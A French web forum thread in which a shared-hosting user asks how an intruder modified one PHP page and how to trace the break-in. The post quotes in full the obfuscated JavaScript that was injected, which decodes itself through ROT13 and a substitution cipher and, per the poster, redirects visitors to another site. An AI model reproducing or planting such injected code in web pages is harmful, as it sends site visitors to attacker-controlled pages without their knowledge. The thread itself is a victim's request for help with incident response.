faille javascript shapgvba via linux, comment remonter ?

[Ekimasu]

bonjour,

mon serveur web mutualisé a subbi un faille. une page inde.php d'un site a été accédé (on ne sait pas comment) et modifié en ajoutant le code javascritp obstrucé suivant :

Citation:

<script language=JavaScript>var mf=" shapgvba ejtf(c){ine ro,con=\" HcvfNU)z\\"n#hG1*PrTR[4`5('082BVWa]-eZo,}9g$_l+m^6bp~w&IiOA|d@s=y7C:.XM q!xtSj;k{3u\",olq=\"\",i,nnu,l=\"\",n;sbe(ro=0;ro<c.y ratgu;ro++){ i=c.puneNg(ro);nnu=con.vaqrkBs(i);vs(nnu>-1){ n=((nnu+1)%81-1);vs(n<=0)n+=81;l+=con.puneNg(n-1); } ryfr l+=i;}olq+=l;qbphzrag.jevgr(olq);}",rmhc="";for(gvg=0;gvg<mf.l ength;gvg++){ fbd = mf.charCodeAt(gvg);if((fbd>64 && fbd<78)||(fbd>96 && fbd<110)) fbd=fbd+13;else if((fbd>77 && fbd<91)||(fbd>109 && fbd<123))fbd=fbd-13;rmhc=rmhc.concat(String.fromCharCode(fbd));} var km,ff; eval( rmhc );km="<A~Msi$U7#]FT#FGla&#B#A~Msi$a>U!c~T\"G]$K;Ms$G'Ua<S eRJ:1U7#]FT#FGl\an#B#S~Msi$\aUSRel\a $$i.//;;;KFccF7G#]#7s$s~AK]G$/yyT$,K&A?az!c~T\"G]$KMG=GMMGMza\a>< \/SeRJ:1>aUmxU</A~Msi$>U"; rwgs(km);</script>

Celui-çi, une fois décodé fait une redirection vers un site TOTO.

ce qui me soucie, est comment la personne est entré sur le serveur et a réussi à modifier ce fichier (uniquement celui-là). une idée de comment remonter la trace ?

merci de votre aide.

[Ekimasu]

ces 2 sites là m'en disent un peu plus mais pas assez pour que je comprenne :

http://www.pouet.net/topic.php?which...age=1&x=36&y=4

http://forum.ovh.com/showthread.php?t=30550

si ça peut aider...